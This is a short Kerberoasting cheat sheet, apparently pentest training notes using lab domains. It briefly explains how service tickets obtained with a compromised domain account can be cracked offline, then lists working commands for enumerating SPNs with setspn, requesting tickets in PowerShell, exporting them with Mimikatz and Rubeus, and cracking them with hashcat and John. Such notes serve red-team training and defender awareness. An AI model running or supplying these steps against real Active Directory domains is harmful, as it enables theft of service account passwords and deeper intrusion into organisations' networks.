Kerberoasting

1. To begin with, an attacker compromises the account of a domain user. The user need not have elevated or “administrator” privileges. The attacker authenticates to the domain.

2. When the malicious user is authenticated, they receive a ticket granting ticket (TGT) from the Kerberos key distribution center (KDC) that is signed by its KRBTGT service account in Active Directory.

3. Next, the malicious actor requests a service ticket for the service they wish to compromise. The domain controller will retrieve the permissions out of the Active Directory database and create a TGS ticket, encrypting it with the service’s password. As a result, only the service and the domain controller are capable of decrypting the ticket since those are the only two entities who share the secret.

4. The domain controller provides the user with the service ticket that is then presented to the service, which will decrypt it and determine whether the user has been granted permission to access the service. At this point, an attacker may extract the ticket from system memory, and crack it offline.

Manual Way

# Get all SPNs
setspn -T marvel.local -Q */*

# Request ticket for specific service
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "Hydra-DC/SQLService.MARVEL.local:60111" 

# Extract the tickets from memory (Mimikatz)
kerberos::list /export

Automated Way

# Generate TGS Ticket For Every SPN (Rubeus)
Rubeus.exe kerberoast /outfile:hashes-2.txt /format:hashcat /simple /nowrap

# Generate for specific user
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe kerberoast /user:svc_mssql /nowrap

# Cracking
hashcat.exe -a 0 -m 13100 kerberoast.txt wordlist.txt

# John
# John Format ($krb5tgs$23$*svc_mssql$dev.cyberbotic.io*$6A9E[blah])
john --format=krb5tgs --wordlist=wordlist.txt kerberoast.txt